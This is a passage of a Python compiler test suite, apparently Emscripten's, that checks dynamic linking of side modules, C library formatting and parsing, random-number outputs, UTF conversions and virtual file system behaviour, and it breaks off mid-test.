def test_dylink_hyper_dupe(self):
self.set_setting('INITIAL_MEMORY', '64mb')
self.set_setting('ASSERTIONS', 2)
# test hyper-dynamic linking, and test duplicate warnings
create_file('third.cpp', r'''
#include <stdio.h>
int sidef() { return 36; }
int sideg = 49;
int bsidef() { return 536; }
extern void only_in_second_1(int x);
extern int second_to_third;
int third_to_second = 1337;
void only_in_third_0() {
// note we access our own globals directly, so
// it doesn't matter that overriding failed
printf("only_in_third_0: %d, %d, %d\n", sidef(), sideg, second_to_third);
only_in_second_1(2112);
}
void only_in_third_1(int x) {
printf("only_in_third_1: %d, %d, %d, %d\n", sidef(), sideg, second_to_third, x);
}
''')
if self.is_wasm():
libname = 'third.wasm'
else:
libname = 'third.js'
self.run_process([EMCC, 'third.cpp', '-o', libname, '-sSIDE_MODULE'] + self.get_emcc_args())
self.dylink_test(main=r'''
#include <stdio.h>
#include <emscripten.h>
extern int sidef();
extern int sideg;
extern int bsidef();
extern int bsideg;
extern void only_in_second_0();
extern void only_in_third_0();
int main() {
EM_ASM({
loadDynamicLibrary('%s'); // hyper-dynamic! works at least for functions (and consts not used in same block)
});
printf("sidef: %%d, sideg: %%d.\n", sidef(), sideg);
printf("bsidef: %%d.\n", bsidef());
only_in_second_0();
only_in_third_0();
}
''' % libname,
side=r'''
#include <stdio.h>
int sidef() { return 10; } // third will try to override these, but fail!
int sideg = 20;
extern void only_in_third_1(int x);
int second_to_third = 500;
extern int third_to_second;
void only_in_second_0() {
printf("only_in_second_0: %d, %d, %d\n", sidef(), sideg, third_to_second);
only_in_third_1(1221);
}
void only_in_second_1(int x) {
printf("only_in_second_1: %d, %d, %d, %d\n", sidef(), sideg, third_to_second, x);
}
''',
expected=['sidef: 10, sideg: 20.\nbsidef: 536.\nonly_in_second_0: 10, 20, 1337\nonly_in_third_1: 36, 49, 500, 1221\nonly_in_third_0: 36, 49, 500\nonly_in_second_1: 10, 20, 1337, 2112\n'],
# in wasm, we can't flip as the side would have an EM_ASM, which we don't support yet TODO
need_reverse=not self.is_wasm())
print('check warnings')
full = self.run_js('src.js')
self.assertContained("warning: symbol '_sideg' from '%s' already exists" % libname, full)
@needs_dylink
def test_dylink_load_compiled_side_module(self):
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args.append('-lnodefs.js')
self.set_setting('INITIAL_MEMORY', '64mb')
# This test loads the module at runtime with loadWebAssemblyModule so we
# want to suppress the automatic loading that would otherwise be done at
# startup.
self.set_setting('NO_AUTOLOAD_DYLIBS')
self.dylink_test(main=r'''
#include <stdio.h>
#include <emscripten.h>
extern int sidef();
int main() {
EM_ASM({
FS.mkdir('/working');
FS.mount(NODEFS,{ root: '.' }, '/working');
var libData = FS.readFile('/working/liblib.so', {encoding: 'binary'});
if (!(libData instanceof Uint8Array)) {
libData = new Uint8Array(libData);
}
var compiledModule = new WebAssembly.Module(libData);
var sideExports = loadWebAssemblyModule(compiledModule, {loadAsync: false, nodelete: true});
mergeLibSymbols(sideExports, 'liblib.so');
});
printf("sidef: %d.\n", sidef());
}
''',
side=r'''
#include <stdio.h>
int sidef() { return 10; }
''',
expected=['sidef: 10'],
# in wasm, we can't flip as the side would have an EM_ASM, which we don't support yet TODO
need_reverse=not self.is_wasm())
@needs_dylink
def test_dylink_dso_needed(self):
def do_run(src, expected_output, emcc_args=[]):
create_file('main.c', src + 'int main() { return test_main(); }')
self.do_runf('main.c', expected_output, emcc_args=emcc_args)
self._test_dylink_dso_needed(do_run)
@needs_dylink
def test_dylink_dot_a(self):
# .a linking must force all .o files inside it, when in a shared module
create_file('third.c', 'int sidef() { return 36; }')
create_file('fourth.c', 'int sideg() { return 17; }')
self.run_process([EMCC, '-fPIC', '-c', 'third.c', '-o', 'third.o'] + self.get_emcc_args(ldflags=False))
self.run_process([EMCC, '-fPIC', '-c', 'fourth.c', '-o', 'fourth.o'] + self.get_emcc_args(ldflags=False))
self.run_process([EMAR, 'rc', 'libfourth.a', 'fourth.o'])
self.dylink_test(main=r'''
#include <stdio.h>
#include <emscripten.h>
int sidef();
int sideg();
int main() {
printf("sidef: %d, sideg: %d.\n", sidef(), sideg());
}
''',
# contents of libfourth.a must be included, even if they aren't referred to!
side=['libfourth.a', 'third.o'],
expected=['sidef: 36, sideg: 17.\n'], force_c=True)
@needs_dylink
def test_dylink_spaghetti(self):
self.dylink_test(main=r'''
#include <stdio.h>
int main_x = 72;
extern int side_x;
int adjust = side_x + 10;
int *ptr = &side_x;
struct Class {
Class() {
printf("main init sees %d, %d, %d.\n", adjust, *ptr, main_x);
}
};
Class cm;
int main() {
printf("main main sees %d, %d, %d.\n", adjust, *ptr, main_x);
return 0;
}
''', side=r'''
#include <stdio.h>
extern int main_x;
int side_x = -534;
int adjust2 = main_x + 10;
int *ptr2 = &main_x;
struct SideClass {
SideClass() {
printf("side init sees %d, %d, %d.\n", adjust2, *ptr2, side_x);
}
};
SideClass cs;
''', expected=['''\
side init sees 82, 72, -534.
main init sees -524, -534, 72.
main main sees -524, -534, 72.
''', '''\
main init sees -524, -534, 72.
side init sees 82, 72, -534.
main main sees -524, -534, 72.
'''])
@needs_make('mingw32-make')
@needs_dylink
def test_dylink_zlib(self):
self.emcc_args += ['-Wno-shift-negative-value', '-I' + test_file('third_party/zlib')]
self.set_setting('RELOCATABLE')
zlib_archive = self.get_zlib_library()
self.dylink_test(main=read_file(test_file('third_party/zlib/example.c')),
side=zlib_archive,
expected=read_file(test_file('core/test_zlib.out')),
force_c=True)
# @needs_dylink
# def test_dylink_bullet(self):
# self.emcc_args += ['-I' + test_file('bullet/src')]
# side = self.get_bullet_library(self, True)
# self.dylink_test(main=read_file(test_file('bullet/Demos/HelloWorld/HelloWorld.cpp')),
# side=side,
# expected=[read_file(test_file('bullet/output.txt')), # different roundings
# read_file(test_file('bullet/output2.txt')),
# read_file(test_file('bullet/output3.txt'))])
@needs_dylink
def test_dylink_rtti(self):
# Verify that objects created in one module and be dynamic_cast<> correctly
# in the another module.
# Each module will define its own copy of certain COMDAT symbols such as
# each classs's typeinfo, but at runtime they should both use the same one.
# Use LLD_REPORT_UNDEFINED to test that it works as expected with weak/COMDAT
# symbols.
self.set_setting('LLD_REPORT_UNDEFINED')
header = '''
#include <cstddef>
class Foo {
public:
virtual ~Foo() {}
};
class Bar : public Foo {
public:
virtual ~Bar() {}
};
bool is_bar(Foo* foo);
'''
main = '''
#include <stdio.h>
#include "header.h"
int main() {
Bar bar;
if (!is_bar(&bar)) {
puts("failure");
return 1;
}
puts("success");
return 0;
}
'''
side = '''
#include "header.h"
bool is_bar(Foo* foo) {
return dynamic_cast<Bar*>(foo) != nullptr;
}
'''
self.dylink_test(main=main,
side=side,
header=header,
expected='success')
@needs_dylink
def test_dylink_argv_argc(self):
# Verify that argc and argv can be sent to main when main is in a side module
self.emcc_args += ['--extern-pre-js', 'pre.js']
create_file('pre.js', '''
var Module = { arguments: ['hello', 'world!'] }
''')
self.dylink_test(
'', # main module is empty.
r'''
#include <stdio.h>
int main(int argc, char const *argv[]) {
printf("%d ", argc);
for (int i=1; i<argc; i++) printf("%s ", argv[i]);
printf("\n");
return 0;
}
''',
expected='3 hello world!',
need_reverse=False)
@needs_dylink
def test_dylink_weak(self):
# Verify that weakly defined symbols can be defined in both side module and main
# module but that only one gets used at runtime.
self.dylink_testf(test_file('core/test_dylink_weak.c'), need_reverse=False)
@node_pthreads
@needs_dylink
def test_dylink_tls(self):
self.emcc_args.append('-Wno-experimental')
self.dylink_testf(test_file('core/test_dylink_tls.c'),
need_reverse=False)
@node_pthreads
@needs_dylink
def test_dylink_tls_export(self):
self.emcc_args.append('-Wno-experimental')
self.dylink_testf(test_file('core/test_dylink_tls_export.c'),
need_reverse=False)
def test_random(self):
src = r'''#include <stdlib.h>
#include <stdio.h>
int main()
{
srandom(0xdeadbeef);
printf("%ld\n", random());
}
'''
self.do_run(src, '956867869')
def test_rand(self):
src = r'''#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
int main()
{
// we need RAND_MAX to be a bitmask (power of 2 minus 1). this assertions guarantees
// if RAND_MAX changes the test failure will focus attention on that issue here.
assert(RAND_MAX == 0x7fffffff);
srand(0xdeadbeef);
for(int i = 0; i < 10; ++i)
printf("%d\n", rand());
unsigned int seed = 0xdeadbeef;
for(int i = 0; i < 10; ++i)
printf("%d\n", rand_r(&seed));
bool haveEvenAndOdd = true;
for(int i = 1; i <= 30; ++i)
{
int mask = 1 << i;
if (mask > RAND_MAX) break;
bool haveEven = false;
bool haveOdd = false;
for(int j = 0; j < 1000 && (!haveEven || !haveOdd); ++j)
{
if ((rand() & mask) == 0)
haveEven = true;
else
haveOdd = true;
}
haveEvenAndOdd = haveEvenAndOdd && haveEven && haveOdd;
}
if (haveEvenAndOdd)
printf("Have even and odd!\n");
return 0;
}
'''
expected = '''490242850
2074599277
1480056542
1912638067
931112055
2110392489
2053422194
1614832492
216117595
174823244
760368382
602359081
1121118963
1291018924
1608306807
352705809
958258461
1182561381
114276303
1481323674
Have even and odd!
'''
self.do_run(src, expected)
def test_strtod(self):
self.do_core_test('test_strtod.c')
def test_strtold(self):
self.do_core_test('test_strtold.c')
def test_strtok(self):
self.do_core_test('test_strtok.c')
def test_strtol(self):
self.do_core_test('test_strtol.c')
def test_transtrcase(self):
self.do_core_test('test_transtrcase.c')
@no_wasm2js('very slow to compile')
@is_slow_test
def test_printf(self):
# needs to flush stdio streams
self.emcc_args.append('-Wno-format')
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('printf/test.c')
def test_printf_2(self):
self.do_core_test('test_printf_2.c')
def test_printf_float(self):
self.do_run_in_out_file_test('printf/test_float.c')
def test_printf_octal(self):
self.do_run_in_out_file_test('printf/test_octal.c')
def test_printf_macros(self):
self.do_core_test('test_printf_macros.c')
def test_vprintf(self):
self.do_core_test('test_vprintf.c')
def test_vsnprintf(self):
self.do_core_test('test_vsnprintf.c')
def test_printf_more(self):
self.do_core_test('test_printf_more.c')
def test_perrar(self):
self.do_core_test('test_perrar.c')
def test_atoX(self):
self.do_core_test('test_atoX.c')
def test_strstr(self):
self.do_core_test('test_strstr.c')
def test_fnmatch(self):
self.do_core_test('test_fnmatch.cpp')
def test_sscanf(self):
self.do_core_test('test_sscanf.c')
def test_sscanf_2(self):
# doubles
for ftype in ['float', 'double']:
src = r'''
#include <stdio.h>
int main(){
char strval1[] = "1.2345678901";
char strval2[] = "1.23456789e5";
char strval3[] = "1.23456789E5";
char strval4[] = "1.2345678e-5";
char strval5[] = "1.2345678E-5";
double dblval = 1.2345678901;
double tstval;
sscanf(strval1, "%lf", &tstval);
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval2, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval3, "%lf", &tstval);
dblval = 123456.789;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval4, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
sscanf(strval5, "%lf", &tstval);
dblval = 0.000012345678;
if(dblval != tstval) printf("FAIL: Values are not equal: %lf %lf\n", dblval, tstval);
else printf("Pass: %lf %lf\n", tstval, dblval);
return 0;
}
'''
if ftype == 'float':
self.do_run(src.replace('%lf', '%f').replace('double', 'float'), '''Pass: 1.234568 1.234568
Pass: 123456.789062 123456.789062
Pass: 123456.789062 123456.789062
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
else:
self.do_run(src, '''Pass: 1.234568 1.234568
Pass: 123456.789000 123456.789000
Pass: 123456.789000 123456.789000
Pass: 0.000012 0.000012
Pass: 0.000012 0.000012''')
def test_sscanf_n(self):
self.do_core_test('test_sscanf_n.c')
def test_sscanf_whitespace(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_sscanf_whitespace.c')
def test_sscanf_other_whitespace(self):
# use i16s in printf
self.set_setting('SAFE_HEAP', 0)
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_sscanf_other_whitespace.c')
def test_sscanf_3(self):
self.do_core_test('test_sscanf_3.c')
def test_sscanf_4(self):
self.do_core_test('test_sscanf_4.c')
def test_sscanf_5(self):
self.do_core_test('test_sscanf_5.c')
def test_sscanf_6(self):
self.do_core_test('test_sscanf_6.c')
def test_sscanf_skip(self):
self.do_core_test('test_sscanf_skip.c')
def test_sscanf_caps(self):
self.do_core_test('test_sscanf_caps.c')
def test_sscanf_hex(self):
self.do_core_test('test_sscanf_hex.cpp')
def test_sscanf_float(self):
self.do_core_test('test_sscanf_float.c')
def test_langinfo(self):
self.do_core_test('test_langinfo.c')
def test_files(self):
self.banned_js_engines = [config.SPIDERMONKEY_ENGINE] # closure can generate variables called 'gc', which pick up js shell stuff
if self.maybe_closure(): # Use closure here, to test we don't break FS stuff
self.emcc_args = [x for x in self.emcc_args if x != '-g'] # ensure we test --closure 1 --memory-init-file 1 (-g would disable closure)
elif '-O3' in self.emcc_args and not self.is_wasm():
print('closure 2')
self.emcc_args += ['--closure', '2'] # Use closure 2 here for some additional coverage
return self.skipTest('TODO: currently skipped because CI runs out of memory running Closure in this test!')
self.emcc_args += ['--pre-js', 'pre.js']
self.set_setting('FORCE_FILESYSTEM')
print('base', self.emcc_args)
create_file('pre.js', '''
/** @suppress{checkTypes}*/
Module = {
'noFSInit': true,
'preRun': function() {
FS.createLazyFile('/', 'test.file', 'test.file', true, false);
// Test FS_* exporting
Module['FS_createDataFile']('/', 'somefile.binary', [100, 200, 50, 25, 10, 77, 123], true, false, false); // 200 becomes -56, since signed chars are used in memory
var test_files_input = 'hi there!';
var test_files_input_index = 0;
FS.init(function() {
return test_files_input.charCodeAt(test_files_input_index++) || null;
});
}
};
''')
create_file('test.file', 'some data')
mem_file = 'files.js.mem'
try_delete(mem_file)
def clean(out):
return '\n'.join([line for line in out.split('\n') if 'binaryen' not in line and 'wasm' not in line and 'so not running' not in line])
self.do_runf(test_file('files.cpp'), ('size: 7\ndata: 100,-56,50,25,10,77,123\nloop: 100 -56 50 25 10 77 123 \ninput:hi there!\ntexto\n$\n5 : 10,30,20,11,88\nother=some data.\nseeked=me da.\nseeked=ata.\nseeked=ta.\nfscanfed: 10 - hello\n5 bytes to dev/null: 5\nok.\ntexte\n', 'size: 7\ndata: 100,-56,50,25,10,77,123\nloop: 100 -56 50 25 10 77 123 \ninput:hi there!\ntexto\ntexte\n$\n5 : 10,30,20,11,88\nother=some data.\nseeked=me da.\nseeked=ata.\nseeked=ta.\nfscanfed: 10 - hello\n5 bytes to dev/null: 5\nok.\n'),
output_nicerizer=clean)
if self.uses_memory_init_file():
self.assertExists(mem_file)
def test_files_m(self):
# Test for Module.stdin etc.
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
create_file('pre.js', '''
Module = {
data: [10, 20, 40, 30],
stdin: function() { return Module.data.pop() || null },
stdout: function(x) { out('got: ' + x) }
};
''')
self.emcc_args += ['--pre-js', 'pre.js']
src = r'''
#include <stdio.h>
#include <unistd.h>
int main () {
char c;
fprintf(stderr, "isatty? %d,%d,%d\n", isatty(fileno(stdin)), isatty(fileno(stdout)), isatty(fileno(stderr)));
while ((c = fgetc(stdin)) != EOF) {
putc(c+5, stdout);
}
return 0;
}
'''
def clean(out):
return '\n'.join(l for l in out.splitlines() if 'warning' not in l and 'binaryen' not in l)
self.do_run(src, ('got: 35\ngot: 45\ngot: 25\ngot: 15\nisatty? 0,0,1\n', 'got: 35\ngot: 45\ngot: 25\ngot: 15\nisatty? 0,0,1', 'isatty? 0,0,1\ngot: 35\ngot: 45\ngot: 25\ngot: 15'), output_nicerizer=clean)
def test_mount(self):
self.set_setting('FORCE_FILESYSTEM')
self.do_runf(test_file('fs/test_mount.c'), 'success')
def test_getdents64(self):
self.do_runf(test_file('fs/test_getdents64.cpp'), '..')
def test_getdents64_special_cases(self):
# https://bugs.chromium.org/p/v8/issues/detail?id=6881
self.banned_js_engines = [config.V8_ENGINE]
self.do_run_in_out_file_test('fs/test_getdents64_special_cases.cpp')
def test_getcwd_with_non_ascii_name(self):
# https://bugs.chromium.org/p/v8/issues/detail?id=6881
self.banned_js_engines = [config.V8_ENGINE]
self.do_run_in_out_file_test('fs/test_getcwd_with_non_ascii_name.cpp')
def test_proc_self_fd(self):
self.do_run_in_out_file_test('fs/test_proc_self_fd.c')
def test_fwrite_0(self):
self.do_core_test('test_fwrite_0.c')
def test_fgetc_ungetc(self):
print('TODO: update this test once the musl ungetc-on-EOF-stream bug is fixed upstream and reaches us')
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
print(fs)
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('stdio/test_fgetc_ungetc.c'), 'success', js_engines=[config.NODE_JS])
def test_fgetc_unsigned(self):
src = r'''
#include <stdio.h>
int main() {
FILE *file = fopen("file_with_byte_234.txt", "rb");
int c = fgetc(file);
printf("*%d\n", c);
}
'''
create_file('file_with_byte_234.txt', b'\xea', binary=True)
self.emcc_args += ['--embed-file', 'file_with_byte_234.txt']
self.do_run(src, '*234\n')
def test_fgets_eol(self):
src = r'''
#include <stdio.h>
char buf[32];
int main()
{
const char *r = "SUCCESS";
FILE *f = fopen("eol.txt", "r");
while (fgets(buf, 32, f) != NULL) {
if (buf[0] == '\0') {
r = "FAIL";
break;
}
}
printf("%s\n", r);
fclose(f);
return 0;
}
'''
open('eol.txt', 'wb').write(b'\n')
self.emcc_args += ['--embed-file', 'eol.txt']
self.do_run(src, 'SUCCESS\n')
def test_fscanf(self):
create_file('three_numbers.txt', '-1 0.1 -.1')
src = r'''
#include <stdio.h>
#include <assert.h>
#include <float.h>
int main()
{
float x = FLT_MAX, y = FLT_MAX, z = FLT_MAX;
FILE* fp = fopen("three_numbers.txt", "r");
if (fp) {
int match = fscanf(fp, " %f %f %f ", &x, &y, &z);
printf("match = %d\n", match);
printf("x = %0.1f, y = %0.1f, z = %0.1f\n", x, y, z);
} else {
printf("failed to open three_numbers.txt\n");
}
return 0;
}
'''
self.emcc_args += ['--embed-file', 'three_numbers.txt']
self.do_run(src, 'match = 3\nx = -1.0, y = 0.1, z = -0.1\n')
def test_fscanf_2(self):
create_file('a.txt', '''1/2/3 4/5/6 7/8/9
''')
self.emcc_args += ['--embed-file', 'a.txt']
self.do_run(r'''#include <cstdio>
#include <iostream>
using namespace std;
int
main( int argv, char ** argc ) {
cout << "fscanf test" << endl;
FILE * file;
file = fopen("a.txt", "rb");
int vertexIndex[4];
int normalIndex[4];
int uvIndex[4];
int matches = fscanf(file, "%d/%d/%d %d/%d/%d %d/%d/%d %d/%d/%d\n", &vertexIndex[0], &uvIndex[0], &normalIndex[0], &vertexIndex [1], &uvIndex[1], &normalIndex[1], &vertexIndex[2], &uvIndex[2], &normalIndex[2], &vertexIndex[3], &uvIndex[3], &normalIndex[3]);
cout << matches << endl;
return 0;
}
''', 'fscanf test\n9\n')
def test_fileno(self):
create_file('empty.txt', '')
src = r'''
#include <stdio.h>
#include <unistd.h>
int main()
{
FILE* fp = fopen("empty.txt", "r");
if (fp) {
printf("%d\n", fileno(fp));
} else {
printf("failed to open empty.txt\n");
}
return 0;
}
'''
self.emcc_args += ['--embed-file', 'empty.txt']
self.do_run(src, '3\n')
@also_with_noderawfs
def test_readdir(self):
self.do_run_in_out_file_test('dirent/test_readdir.c')
@also_with_wasm_bigint
def test_readdir_empty(self):
self.do_run_in_out_file_test('dirent/test_readdir_empty.c')
def test_stat(self):
self.do_runf(test_file('stat/test_stat.c'), 'success')
self.verify_in_strict_mode('test_stat.js')
def test_fstatat(self):
self.do_runf(test_file('stat/test_fstatat.c'), 'success')
def test_stat_chmod(self):
self.do_runf(test_file('stat/test_chmod.c'), 'success')
def test_stat_mknod(self):
self.do_runf(test_file('stat/test_mknod.c'), 'success')
def test_fcntl(self):
self.add_pre_run("FS.createDataFile('/', 'test', 'abcdef', true, true, false);")
self.do_run_in_out_file_test('fcntl/test_fcntl.c')
def test_fcntl_open(self):
self.do_run_in_out_file_test('fcntl/test_fcntl_open.c')
@also_with_wasm_bigint
def test_fcntl_misc(self):
self.add_pre_run("FS.createDataFile('/', 'test', 'abcdef', true, true, false);")
self.do_run_in_out_file_test('fcntl/test_fcntl_misc.c')
def test_poll(self):
self.add_pre_run('''
var dummy_device = FS.makedev(64, 0);
FS.registerDevice(dummy_device, {});
FS.createDataFile('/', 'file', 'abcdef', true, true, false);
FS.mkdev('/device', dummy_device);
''')
self.do_core_test('test_poll.c')
def test_statvfs(self):
self.do_core_test('test_statvfs.c')
def test_libgen(self):
self.do_core_test('test_libgen.c')
def test_utime(self):
self.do_runf(test_file('utime/test_utime.c'), 'success')
def test_futimens(self):
self.do_runf(test_file('utime', 'test_futimens.c'), 'success')
@no_minimal_runtime('MINIMAL_RUNTIME does not have getValue() and setValue() (TODO add it to a JS library function to get it in)')
def test_utf(self):
self.banned_js_engines = [config.SPIDERMONKEY_ENGINE] # only node handles utf well
self.set_setting('EXPORTED_FUNCTIONS', ['_main', '_malloc', '_free'])
self.set_setting('EXPORTED_RUNTIME_METHODS', ['getValue', 'setValue', 'UTF8ToString', 'stringToUTF8'])
self.do_core_test('test_utf.c')
def test_utf32(self):
if self.get_setting('MINIMAL_RUNTIME'):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$UTF32ToString', '$stringToUTF32', '$lengthBytesUTF32'])
else:
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF32ToString', 'stringToUTF32', 'lengthBytesUTF32'])
self.do_runf(test_file('utf32.cpp'), 'OK.')
self.do_runf(test_file('utf32.cpp'), 'OK.', args=['-fshort-wchar'])
def test_utf16(self):
self.do_runf(test_file('core/test_utf16.cpp'), 'OK.')
def test_utf8(self):
if self.get_setting('MINIMAL_RUNTIME'):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$AsciiToString', '$stringToAscii', '$writeAsciiToMemory'])
else:
self.set_setting('EXPORTED_RUNTIME_METHODS',
['UTF8ToString', 'stringToUTF8', 'AsciiToString', 'stringToAscii'])
self.do_runf(test_file('utf8.cpp'), 'OK.')
@also_with_wasm_bigint
def test_utf8_textdecoder(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF8ToString', 'stringToUTF8'])
self.emcc_args += ['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt']
self.do_runf(test_file('benchmark_utf8.cpp'), 'OK.')
# Test that invalid character in UTF8 does not cause decoding to crash.
def test_utf8_invalid(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF8ToString', 'stringToUTF8'])
for decoder_mode in [[], ['-sTEXTDECODER']]:
self.emcc_args += decoder_mode
print(str(decoder_mode))
self.do_runf(test_file('utf8_invalid.cpp'), 'OK.')
# Test that invalid character in UTF8 does not cause decoding to crash.
@no_asan('TODO: ASan support in minimal runtime')
def test_minimal_runtime_utf8_invalid(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF8ToString', 'stringToUTF8'])
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
for decoder_mode in [False, True]:
self.set_setting('TEXTDECODER', decoder_mode)
print(str(decoder_mode))
self.do_runf(test_file('utf8_invalid.cpp'), 'OK.')
def test_utf16_textdecoder(self):
self.set_setting('EXPORTED_RUNTIME_METHODS', ['UTF16ToString', 'stringToUTF16', 'lengthBytesUTF16'])
self.emcc_args += ['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt']
self.do_runf(test_file('benchmark_utf16.cpp'), 'OK.')
def test_wprintf(self):
self.do_core_test('test_wprintf.cpp')
def test_write_stdout_fileno(self):
self.do_core_test('test_write_stdout_fileno.c')
self.do_core_test('test_write_stdout_fileno.c', args=['-sFILESYSTEM=0'])
@also_with_wasmfs # tests EXIT_RUNTIME flushing
def test_direct_string_constant_usage(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_direct_string_constant_usage.cpp')
def test_std_cout_new(self):
self.do_core_test('test_std_cout_new.cpp')
def test_std_function_incomplete_return(self):
self.do_core_test('test_std_function_incomplete_return.cpp')
def test_istream(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
for linkable in [0]: # , 1]:
print(linkable)
# regression check for issue #273
self.set_setting('LINKABLE', linkable)
self.do_core_test('test_istream.cpp')
def test_fs_base(self):
self.set_setting('DEFAULT_LIBRARY_FUNCS_TO_INCLUDE', ['$FS'])
self.uses_es6 = True
self.add_pre_run(read_file(test_file('filesystem/src.js')))
src = 'int main() {return 0;}\n'
expected = read_file(test_file('filesystem/output.txt'))
self.do_run(src, expected)
@also_with_noderawfs
@is_slow_test
def test_fs_nodefs_rw(self):
# TODO(sbc): This test exposes in issue in the way we run closure compiler and
# causes it to generate non-ES5 output.
# Remove this line once we fix: https://github.com/emscripten-core/emscripten/issues/12628
self.uses_es6 = True
self.emcc_args += ['-lnodefs.js']
self.set_setting('SYSCALL_DEBUG')
self.do_runf(test_file('fs/test_nodefs_rw.c'), 'success')
if self.maybe_closure():
self.do_runf(test_file('fs/test_nodefs_rw.c'), 'success')
@also_with_noderawfs
def test_fs_nodefs_cloexec(self):
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_cloexec.c'), 'success')
def test_fs_nodefs_home(self):
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_home.c'), 'success', js_engines=[config.NODE_JS])
def test_fs_nodefs_nofollow(self):
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_nofollow.c'), 'success', js_engines=[config.NODE_JS])
def test_fs_nodefs_readdir(self):
# externally setup an existing folder structure: existing/a
os.makedirs(os.path.join(self.working_dir, 'existing', 'a'))
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_nodefs_readdir.c'), 'success')
@no_windows('no symlink support on windows')
def test_fs_noderawfs_nofollow(self):
self.set_setting('NODERAWFS')
create_file('filename', 'foo')
os.symlink('filename', 'linkname')
self.emcc_args += ['-lnodefs.js']
self.do_runf(test_file('fs/test_noderawfs_nofollow.c'), 'success', js_engines=[config.NODE_JS])
def test_fs_trackingdelegate(self):
self.set_setting('FS_DEBUG')
self.do_run_in_out_file_test('fs/test_trackingdelegate.c')
@also_with_noderawfs
def test_fs_writeFile(self):
self.set_setting('DISABLE_EXCEPTION_CATCHING') # see issue 2334
self.do_run_in_out_file_test('fs/test_writeFile.cpp')
def test_fs_write(self):
self.do_run_in_out_file_test('fs/test_write.cpp')
@also_with_noderawfs
def test_fs_emptyPath(self):
self.do_run_in_out_file_test('fs/test_emptyPath.c')
@also_with_noderawfs
def test_fs_append(self):
self.do_runf(test_file('fs/test_append.c'), 'success')
def test_fs_mmap(self):
self.uses_es6 = True
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS', 'NODERAWFS']:
self.emcc_args = orig_compiler_opts + ['-D' + fs]
if fs == 'NODEFS':
self.emcc_args += ['-lnodefs.js']
if fs == 'NODERAWFS':
self.emcc_args += ['-lnodefs.js', '-lnoderawfs.js']
self.do_run_in_out_file_test('fs/test_mmap.c')
@parameterized({
'': [],
'minimal_runtime': ['-sMINIMAL_RUNTIME=1']
})
def test_fs_no_main(self, *args):
# library_fs.js uses hooks to enable ignoreing of permisions up until ATMAINs are run. This
# test verified that they work correctly, even in programs without a main function.
create_file('pre.js', '''
Module['preRun'] = function() {
assert(FS.ignorePermissions, "ignorePermissions not set during preRun");
}
Module['onRuntimeInitialized'] = function() {
assert(!FS.ignorePermissions, "ignorePermissions not unset during onRuntimeInitialized");
assert(_foo() == 42);
}
''')
self.set_setting('EXPORTED_FUNCTIONS', '_foo')
self.set_setting('FORCE_FILESYSTEM')
self.emcc_args += ['--pre-js', 'pre.js'] + list(args)
self.do_run('int foo() { return 42; }', '', force_c=True)
@also_with_noderawfs
def test_fs_errorstack(self):
# Enables strict mode, which may catch some strict-mode-only errors
# so that users can safely work with strict JavaScript if enabled.
create_file('pre.js', '"use strict";')
self.emcc_args += ['--pre-js', 'pre.js']
self.set_setting('FORCE_FILESYSTEM')
self.set_setting('ASSERTIONS')
self.do_run(r'''
#include <emscripten.h>
#include <iostream>
int main(void) {
std::cout << "hello world\n"; // should work with strict mode
EM_ASM(
try {
FS.readFile('/dummy.txt');
} catch (err) {
err.stack = err.stack; // should be writable
throw err;
}
);
return 0;
}
''', 'at Object.readFile', assert_returncode=NON_ZERO) # engines has different error stack format
@also_with_noderawfs
def test_fs_llseek(self):
self.set_setting('FORCE_FILESYSTEM')
self.do_runf(test_file('fs/test_llseek.c'), 'success')
def test_fs_64bit(self):
self.do_runf(test_file('fs/test_64bit.c'), 'success')
def test_sigalrm(self):
self.do_runf(test_file('test_sigalrm.c'), 'Received alarm!')
self.set_setting('EXIT_RUNTIME')
self.do_runf(test_file('test_sigalrm.c'), 'Received alarm!')
def test_signals(self):
self.do_core_test(test_file('test_signals.c'))
@no_windows('https://github.com/emscripten-core/emscripten/issues/8882')
def test_unistd_access(self):
self.uses_es6 = True
orig_compiler_opts = self.emcc_args.copy()
for fs in ['MEMFS', 'NODEFS']:
